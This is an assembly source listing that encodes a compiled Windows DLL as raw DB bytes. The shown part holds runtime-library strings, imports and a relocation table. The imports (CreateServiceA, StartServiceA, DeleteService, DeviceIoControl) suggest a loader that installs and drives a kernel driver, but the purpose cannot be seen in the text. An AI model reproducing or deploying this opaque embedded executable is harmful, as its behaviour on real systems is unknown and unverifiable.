DB 065H,06EH,074H,073H,00DH,00AH,000H,000H,000H,052H,036H,030H,030H,032H,00DH
DB 00AH,02DH,020H,066H,06CH,06FH,061H,074H,069H,06EH,067H,020H,070H,06FH,069H
DB 06EH,074H,020H,06EH,06FH,074H,020H,06CH,06FH,061H,064H,065H,064H,00DH,00AH
DB 000H,000H,000H,000H,000H,000H,000H,000H,002H,000H,000H,000H,05CH,055H,000H
DB 010H,008H,000H,000H,000H,030H,055H,000H,010H,009H,000H,000H,000H,004H,055H
DB 000H,010H,00AH,000H,000H,000H,0E0H,054H,000H,010H,010H,000H,000H,000H,0B4H
DB 054H,000H,010H,011H,000H,000H,000H,084H,054H,000H,010H,012H,000H,000H,000H
DB 060H,054H,000H,010H,013H,000H,000H,000H,034H,054H,000H,010H,018H,000H,000H
DB 000H,0FCH,053H,000H,010H,019H,000H,000H,000H,0D4H,053H,000H,010H,01AH,000H
DB 000H,000H,09CH,053H,000H,010H,01BH,000H,000H,000H,064H,053H,000H,010H,078H
DB 000H,000H,000H,054H,053H,000H,010H,079H,000H,000H,000H,044H,053H,000H,010H
DB 07AH,000H,000H,000H,034H,053H,000H,010H,0FCH,000H,000H,000H,030H,053H,000H
DB 010H,0FFH,000H,000H,000H,020H,053H,000H,010H,000H,000H,000H,000H,04DH,069H
DB 063H,072H,06FH,073H,06FH,066H,074H,020H,056H,069H,073H,075H,061H,06CH,020H
DB 043H,02BH,02BH,020H,052H,075H,06EH,074H,069H,06DH,065H,020H,04CH,069H,062H
DB 072H,061H,072H,079H,000H,000H,000H,000H,00AH,00AH,000H,000H,052H,075H,06EH
DB 074H,069H,06DH,065H,020H,045H,072H,072H,06FH,072H,021H,00AH,00AH,050H,072H
DB 06FH,067H,072H,061H,06DH,03AH,020H,000H,000H,000H,02EH,02EH,02EH,000H,03CH
DB 070H,072H,06FH,067H,072H,061H,06DH,020H,06EH,061H,06DH,065H,020H,075H,06EH
DB 06BH,06EH,06FH,077H,06EH,03EH,000H,000H,000H,000H,000H,000H,0E0H,05FH,000H
DB 010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,0C8H
DB 05FH,000H,010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 0F8H,05FH,000H,010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,010H,060H,000H,010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,005H,000H,000H,0C0H,00BH,000H,000H,000H,000H,000H
DB 000H,000H,01DH,000H,000H,0C0H,004H,000H,000H,000H,000H,000H,000H,000H,096H
DB 000H,000H,0C0H,004H,000H,000H,000H,000H,000H,000H,000H,08DH,000H,000H,0C0H
DB 008H,000H,000H,000H,000H,000H,000H,000H,08EH,000H,000H,0C0H,008H,000H,000H
DB 000H,000H,000H,000H,000H,08FH,000H,000H,0C0H,008H,000H,000H,000H,000H,000H
DB 000H,000H,090H,000H,000H,0C0H,008H,000H,000H,000H,000H,000H,000H,000H,091H
DB 000H,000H,0C0H,008H,000H,000H,000H,000H,000H,000H,000H,092H,000H,000H,0C0H
DB 008H,000H,000H,000H,000H,000H,000H,000H,093H,000H,000H,0C0H,008H,000H,000H
DB 000H,000H,000H,000H,000H,003H,000H,000H,000H,007H,000H,000H,000H,078H,000H
DB 000H,000H,00AH,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,047H,065H,074H,04CH,061H,073H,074H,041H,063H,074H,069H,076H,065H,050H
DB 06FH,070H,075H,070H,000H,000H,047H,065H,074H,041H,063H,074H,069H,076H,065H
DB 057H,069H,06EH,064H,06FH,077H,000H,04DH,065H,073H,073H,061H,067H,065H,042H
DB 06FH,078H,041H,000H,075H,073H,065H,072H,033H,032H,02EH,064H,06CH,06CH,000H
DB 000H,000H,000H,000H,000H,020H,0A4H,000H,010H,000H,000H,000H,000H,020H,0A4H
DB 000H,010H,001H,001H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,002H,000H,000H,000H,001H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,002H,000H,000H,000H,002H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,00AH,000H,000H,000H,000H,000H,000H
DB 000H,041H,073H,073H,065H,072H,074H,069H,06FH,06EH,020H,066H,061H,069H,06CH
DB 065H,064H,03AH,020H,025H,073H,02CH,020H,066H,069H,06CH,065H,020H,025H,073H
DB 02CH,020H,06CH,069H,06EH,065H,020H,025H,064H,00AH,000H,05CH,056H,000H,010H
DB 0B0H,05AH,000H,010H,03CH,056H,000H,010H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,001H,000H
DB 000H,000H,016H,000H,000H,000H,002H,000H,000H,000H,002H,000H,000H,000H,003H
DB 000H,000H,000H,002H,000H,000H,000H,004H,000H,000H,000H,018H,000H,000H,000H
DB 005H,000H,000H,000H,00DH,000H,000H,000H,006H,000H,000H,000H,009H,000H,000H
DB 000H,007H,000H,000H,000H,00CH,000H,000H,000H,008H,000H,000H,000H,00CH,000H
DB 000H,000H,009H,000H,000H,000H,00CH,000H,000H,000H,00AH,000H,000H,000H,007H
DB 000H,000H,000H,00BH,000H,000H,000H,008H,000H,000H,000H,00CH,000H,000H,000H
DB 016H,000H,000H,000H,00DH,000H,000H,000H,016H,000H,000H,000H,00FH,000H,000H
DB 000H,002H,000H,000H,000H,010H,000H,000H,000H,00DH,000H,000H,000H,011H,000H
DB 000H,000H,012H,000H,000H,000H,012H,000H,000H,000H,002H,000H,000H,000H,021H
DB 000H,000H,000H,00DH,000H,000H,000H,035H,000H,000H,000H,002H,000H,000H,000H
DB 041H,000H,000H,000H,00DH,000H,000H,000H,043H,000H,000H,000H,002H,000H,000H
DB 000H,050H,000H,000H,000H,011H,000H,000H,000H,052H,000H,000H,000H,00DH,000H
DB 000H,000H,053H,000H,000H,000H,00DH,000H,000H,000H,057H,000H,000H,000H,016H
DB 000H,000H,000H,059H,000H,000H,000H,00BH,000H,000H,000H,06CH,000H,000H,000H
DB 00DH,000H,000H,000H,06DH,000H,000H,000H,020H,000H,000H,000H,070H,000H,000H
DB 000H,01CH,000H,000H,000H,072H,000H,000H,000H,009H,000H,000H,000H,006H,000H
DB 000H,000H,016H,000H,000H,000H,080H,000H,000H,000H,00AH,000H,000H,000H,081H
DB 000H,000H,000H,00AH,000H,000H,000H,082H,000H,000H,000H,009H,000H,000H,000H
DB 083H,000H,000H,000H,016H,000H,000H,000H,084H,000H,000H,000H,00DH,000H,000H
DB 000H,091H,000H,000H,000H,029H,000H,000H,000H,09EH,000H,000H,000H,00DH,000H
DB 000H,000H,0A1H,000H,000H,000H,002H,000H,000H,000H,0A4H,000H,000H,000H,00BH
DB 000H,000H,000H,0A7H,000H,000H,000H,00DH,000H,000H,000H,0B7H,000H,000H,000H
DB 011H,000H,000H,000H,0CEH,000H,000H,000H,002H,000H,000H,000H,0D7H,000H,000H
DB 000H,00BH,000H,000H,000H,018H,007H,000H,000H,00CH,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,028H,000H,06EH,000H,075H,000H,06CH,000H,06CH
DB 000H,029H,000H,000H,000H,000H,000H,028H,06EH,075H,06CH,06CH,029H,000H,000H
DB 080H,05CH,000H,010H,070H,05CH,000H,010H,0C0H,037H,000H,010H,0C0H,037H,000H
DB 010H,0C0H,037H,000H,010H,0C0H,037H,000H,010H,0C0H,037H,000H,010H,0C0H,037H
DB 000H,010H,0B2H,05CH,000H,010H,0B2H,05CH,000H,010H,000H,000H,020H,000H,020H
DB 000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H
DB 028H,000H,028H,000H,028H,000H,028H,000H,028H,000H,020H,000H,020H,000H,020H
DB 000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H
DB 020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H,000H,020H
DB 000H,048H,000H,010H,000H,010H,000H,010H,000H,010H,000H,010H,000H,010H,000H
DB 010H,000H,010H,000H,010H,000H,010H,000H,010H,000H,010H,000H,010H,000H,010H
DB 000H,010H,000H,084H,000H,084H,000H,084H,000H,084H,000H,084H,000H,084H,000H
DB 084H,000H,084H,000H,084H,000H,084H,000H,010H,000H,010H,000H,010H,000H,010H
DB 000H,010H,000H,010H,000H,010H,000H,081H,000H,081H,000H,081H,000H,081H,000H
DB 081H,000H,081H,000H,001H,000H,001H,000H,001H,000H,001H,000H,001H,000H,001H
DB 000H,001H,000H,001H,000H,001H,000H,001H,000H,001H,000H,001H,000H,001H,000H
DB 001H,000H,001H,000H,001H,000H,001H,000H,001H,000H,001H,000H,001H,000H,010H
DB 000H,010H,000H,010H,000H,010H,000H,010H,000H,010H,000H,082H,000H,082H,000H
DB 082H,000H,082H,000H,082H,000H,082H,000H,002H,000H,002H,000H,002H,000H,002H
DB 000H,002H,000H,002H,000H,002H,000H,002H,000H,002H,000H,002H,000H,002H,000H
DB 002H,000H,002H,000H,002H,000H,002H,000H,002H,000H,002H,000H,002H,000H,002H
DB 000H,002H,000H,010H,000H,010H,000H,010H,000H,010H,000H,020H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,001H,000H,000H,000H,02EH,000H,000H,000H,001H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,070H,0C0H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 04EH,0C2H,000H,000H,044H,0C1H,000H,000H,01CH,0C1H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,068H,0C2H,000H,000H,0F0H,0C1H,000H,000H,050H,0C0H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,0F0H,0C2H,000H,000H,024H
DB 0C1H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,0E0H,0C2H,000H,000H,0CEH,0C2H,000H
DB 000H,08AH,0C2H,000H,000H,074H,0C2H,000H,000H,0AEH,0C2H,000H,000H,0BEH,0C2H
DB 000H,000H,09CH,0C2H,000H,000H,000H,000H,000H,000H,040H,0C2H,000H,000H,030H
DB 0C2H,000H,000H,018H,0C2H,000H,000H,006H,0C2H,000H,000H,0B8H,0C3H,000H,000H
DB 036H,0C4H,000H,000H,020H,0C4H,000H,000H,0FEH,0C2H,000H,000H,010H,0C3H,000H
DB 000H,022H,0C3H,000H,000H,036H,0C3H,000H,000H,044H,0C3H,000H,000H,052H,0C3H
DB 000H,000H,068H,0C3H,000H,000H,076H,0C3H,000H,000H,082H,0C3H,000H,000H,08CH
DB 0C3H,000H,000H,09CH,0C3H,000H,000H,0AAH,0C3H,000H,000H,0F8H,0C1H,000H,000H
DB 0C6H,0C3H,000H,000H,0D8H,0C3H,000H,000H,0E6H,0C3H,000H,000H,0F6H,0C3H,000H
DB 000H,008H,0C4H,000H,000H,068H,0C5H,000H,000H,078H,0C5H,000H,000H,042H,0C4H
DB 000H,000H,04CH,0C4H,000H,000H,058H,0C4H,000H,000H,072H,0C4H,000H,000H,08AH
DB 0C4H,000H,000H,0A4H,0C4H,000H,000H,0BEH,0C4H,000H,000H,0D4H,0C4H,000H,000H
DB 0E0H,0C4H,000H,000H,0FCH,0C4H,000H,000H,014H,0C5H,000H,000H,02CH,0C5H,000H
DB 000H,038H,0C5H,000H,000H,044H,0C5H,000H,000H,054H,0C5H,000H,000H,000H,000H
DB 000H,000H,05CH,0C2H,000H,000H,000H,000H,000H,000H,0E0H,0C2H,000H,000H,0CEH
DB 0C2H,000H,000H,08AH,0C2H,000H,000H,074H,0C2H,000H,000H,0AEH,0C2H,000H,000H
DB 0BEH,0C2H,000H,000H,09CH,0C2H,000H,000H,000H,000H,000H,000H,040H,0C2H,000H
DB 000H,030H,0C2H,000H,000H,018H,0C2H,000H,000H,006H,0C2H,000H,000H,0B8H,0C3H
DB 000H,000H,036H,0C4H,000H,000H,020H,0C4H,000H,000H,0FEH,0C2H,000H,000H,010H
DB 0C3H,000H,000H,022H,0C3H,000H,000H,036H,0C3H,000H,000H,044H,0C3H,000H,000H
DB 052H,0C3H,000H,000H,068H,0C3H,000H,000H,076H,0C3H,000H,000H,082H,0C3H,000H
DB 000H,08CH,0C3H,000H,000H,09CH,0C3H,000H,000H,0AAH,0C3H,000H,000H,0F8H,0C1H
DB 000H,000H,0C6H,0C3H,000H,000H,0D8H,0C3H,000H,000H,0E6H,0C3H,000H,000H,0F6H
DB 0C3H,000H,000H,008H,0C4H,000H,000H,068H,0C5H,000H,000H,078H,0C5H,000H,000H
DB 042H,0C4H,000H,000H,04CH,0C4H,000H,000H,058H,0C4H,000H,000H,072H,0C4H,000H
DB 000H,08AH,0C4H,000H,000H,0A4H,0C4H,000H,000H,0BEH,0C4H,000H,000H,0D4H,0C4H
DB 000H,000H,0E0H,0C4H,000H,000H,0FCH,0C4H,000H,000H,014H,0C5H,000H,000H,02CH
DB 0C5H,000H,000H,038H,0C5H,000H,000H,044H,0C5H,000H,000H,054H,0C5H,000H,000H
DB 000H,000H,000H,000H,05CH,0C2H,000H,000H,000H,000H,000H,000H,016H,000H,043H
DB 06CH,06FH,073H,065H,048H,061H,06EH,064H,06CH,065H,000H,047H,000H,044H,065H
DB 076H,069H,063H,065H,049H,06FH,043H,06FH,06EH,074H,072H,06FH,06CH,000H,0C2H
DB 000H,047H,065H,074H,043H,075H,072H,072H,065H,06EH,074H,044H,069H,072H,065H
DB 063H,074H,06FH,072H,079H,041H,000H,000H,0E1H,000H,047H,065H,074H,04CH,061H
DB 073H,074H,045H,072H,072H,06FH,072H,000H,000H,02BH,000H,043H,072H,065H,061H
DB 074H,065H,046H,069H,06CH,065H,041H,000H,04BH,045H,052H,04EH,045H,04CH,033H
DB 032H,02EH,064H,06CH,06CH,000H,000H,049H,002H,077H,073H,070H,072H,069H,06EH
DB 074H,066H,041H,000H,055H,053H,045H,052H,033H,032H,02EH,064H,06CH,06CH,000H
DB 000H,016H,000H,043H,06CH,06FH,073H,065H,053H,065H,072H,076H,069H,063H,065H
DB 048H,061H,06EH,064H,06CH,065H,000H,000H,0B1H,000H,04FH,070H,065H,06EH,053H
DB 043H,04DH,061H,06EH,061H,067H,065H,072H,041H,000H,000H,01CH,000H,043H,072H
DB 065H,061H,074H,065H,053H,065H,072H,076H,069H,063H,065H,041H,000H,000H,006H
DB 001H,053H,074H,061H,072H,074H,053H,065H,072H,076H,069H,063H,065H,041H,000H
DB 0B3H,000H,04FH,070H,065H,06EH,053H,065H,072H,076H,069H,063H,065H,041H,000H
DB 000H,017H,000H,043H,06FH,06EH,074H,072H,06FH,06CH,053H,065H,072H,076H,069H
DB 063H,065H,000H,000H,01FH,000H,044H,065H,06CH,065H,074H,065H,053H,065H,072H
DB 076H,069H,063H,065H,000H,041H,044H,056H,041H,050H,049H,033H,032H,02EH,064H
DB 06CH,06CH,000H,000H,09FH,000H,047H,065H,074H,043H,06FH,06DH,06DH,061H,06EH
DB 064H,04CH,069H,06EH,065H,041H,000H,003H,001H,047H,065H,074H,050H,072H,06FH
DB 063H,041H,064H,064H,072H,065H,073H,073H,000H,000H,0EBH,000H,047H,065H,074H
DB 04DH,06FH,064H,075H,06CH,065H,048H,061H,06EH,064H,06CH,065H,041H,000H,000H
DB 037H,001H,047H,065H,074H,056H,065H,072H,073H,069H,06FH,06EH,000H,000H,062H
DB 000H,045H,078H,069H,074H,050H,072H,06FH,063H,065H,073H,073H,000H,0C7H,000H
DB 047H,065H,074H,043H,075H,072H,072H,065H,06EH,074H,054H,068H,072H,065H,061H
DB 064H,049H,064H,000H,000H,022H,002H,054H,06CH,073H,053H,065H,074H,056H,061H
DB 06CH,075H,065H,000H,01FH,002H,054H,06CH,073H,041H,06CH,06CH,06FH,063H,000H
DB 000H,020H,002H,054H,06CH,073H,046H,072H,065H,065H,000H,0FDH,001H,053H,065H
DB 074H,04CH,061H,073H,074H,045H,072H,072H,06FH,072H,000H,000H,021H,002H,054H
DB 06CH,073H,047H,065H,074H,056H,061H,06CH,075H,065H,000H,055H,001H,048H,065H
DB 061H,070H,043H,072H,065H,061H,074H,065H,000H,000H,057H,001H,048H,065H,061H
DB 070H,044H,065H,073H,074H,072H,06FH,079H,000H,0FAH,001H,053H,065H,074H,048H
DB 061H,06EH,064H,06CH,065H,043H,06FH,075H,06EH,074H,000H,000H,0DCH,000H,047H
DB 065H,074H,046H,069H,06CH,065H,054H,079H,070H,065H,000H,016H,001H,047H,065H
DB 074H,053H,074H,064H,048H,061H,06EH,064H,06CH,065H,000H,000H,014H,001H,047H
DB 065H,074H,053H,074H,061H,072H,074H,075H,070H,049H,06EH,066H,06FH,041H,000H
DB 044H,000H,044H,065H,06CH,065H,074H,065H,043H,072H,069H,074H,069H,063H,061H
DB 06CH,053H,065H,063H,074H,069H,06FH,06EH,000H,0E9H,000H,047H,065H,074H,04DH
DB 06FH,064H,075H,06CH,065H,046H,069H,06CH,065H,04EH,061H,06DH,065H,041H,000H
DB 000H,098H,000H,047H,065H,074H,043H,050H,049H,06EH,066H,06FH,000H,092H,000H
DB 047H,065H,074H,041H,043H,050H,000H,000H,0F6H,000H,047H,065H,074H,04FH,045H
DB 04DH,043H,050H,000H,000H,08BH,000H,046H,072H,065H,065H,045H,06EH,076H,069H
DB 072H,06FH,06EH,06DH,065H,06EH,074H,053H,074H,072H,069H,06EH,067H,073H,041H
DB 000H,0D0H,000H,047H,065H,074H,045H,06EH,076H,069H,072H,06FH,06EH,06DH,065H
DB 06EH,074H,053H,074H,072H,069H,06EH,067H,073H,000H,08CH,000H,046H,072H,065H
DB 065H,045H,06EH,076H,069H,072H,06FH,06EH,06DH,065H,06EH,074H,053H,074H,072H
DB 069H,06EH,067H,073H,057H,000H,0D2H,000H,047H,065H,074H,045H,06EH,076H,069H
DB 072H,06FH,06EH,06DH,065H,06EH,074H,053H,074H,072H,069H,06EH,067H,073H,057H
DB 000H,000H,042H,002H,057H,069H,064H,065H,043H,068H,061H,072H,054H,06FH,04DH
DB 075H,06CH,074H,069H,042H,079H,074H,065H,000H,04FH,002H,057H,072H,069H,074H
DB 065H,046H,069H,06CH,065H,000H,064H,001H,049H,06EH,069H,074H,069H,061H,06CH
DB 069H,07AH,065H,043H,072H,069H,074H,069H,063H,061H,06CH,053H,065H,063H,074H
DB 069H,06FH,06EH,000H,04FH,000H,045H,06EH,074H,065H,072H,043H,072H,069H,074H
DB 069H,063H,061H,06CH,053H,065H,063H,074H,069H,06FH,06EH,000H,000H,077H,001H
DB 04CH,065H,061H,076H,065H,043H,072H,069H,074H,069H,063H,061H,06CH,053H,065H
DB 063H,074H,069H,06FH,06EH,000H,000H,053H,001H,048H,065H,061H,070H,041H,06CH
DB 06CH,06FH,063H,000H,059H,001H,048H,065H,061H,070H,046H,072H,065H,065H,000H
DB 000H,078H,001H,04CH,06FH,061H,064H,04CH,069H,062H,072H,061H,072H,079H,041H
DB 000H,000H,083H,000H,046H,06CH,075H,073H,068H,046H,069H,06CH,065H,042H,075H
DB 066H,066H,065H,072H,073H,000H,000H,006H,002H,053H,065H,074H,053H,074H,064H
DB 048H,061H,06EH,064H,06CH,065H,000H,000H,0F8H,001H,053H,065H,074H,046H,069H
DB 06CH,065H,050H,06FH,069H,06EH,074H,065H,072H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,010H,000H,000H,034H,001H
DB 000H,000H,020H,030H,026H,030H,07CH,030H,093H,030H,099H,030H,0E4H,030H,0EAH
DB 030H,00BH,031H,01FH,031H,027H,031H,064H,031H,082H,031H,088H,031H,0E1H,031H
DB 0F0H,031H,0F6H,031H,01CH,032H,022H,032H,064H,032H,084H,032H,089H,032H,094H
DB 032H,0A5H,032H,0ADH,032H,0C8H,032H,0E0H,032H,0FBH,032H,013H,033H,03DH,033H
DB 073H,033H,0A7H,033H,0B5H,033H,0D3H,033H,0E9H,033H,0F8H,033H,00BH,034H,02DH
DB 034H,034H,034H,054H,034H,079H,034H,09DH,034H,0BEH,034H,0E6H,034H,002H,035H
DB 00BH,035H,033H,035H,045H,035H,04EH,035H,06FH,035H,075H,035H,07BH,035H,097H
DB 035H,09DH,035H,0A6H,035H,0ADH,035H,0C8H,035H,0D7H,035H,0E0H,035H,0E5H,035H
DB 0EBH,035H,0F5H,035H,00EH,036H,013H,036H,01EH,036H,024H,036H,05EH,036H,069H
DB 036H,06FH,036H,0C3H,036H,0D2H,036H,0F0H,036H,0FAH,036H,066H,037H,081H,037H
DB 090H,037H,0B0H,037H,0C1H,037H,0CCH,037H,0D1H,037H,0DEH,037H,0E3H,037H,029H
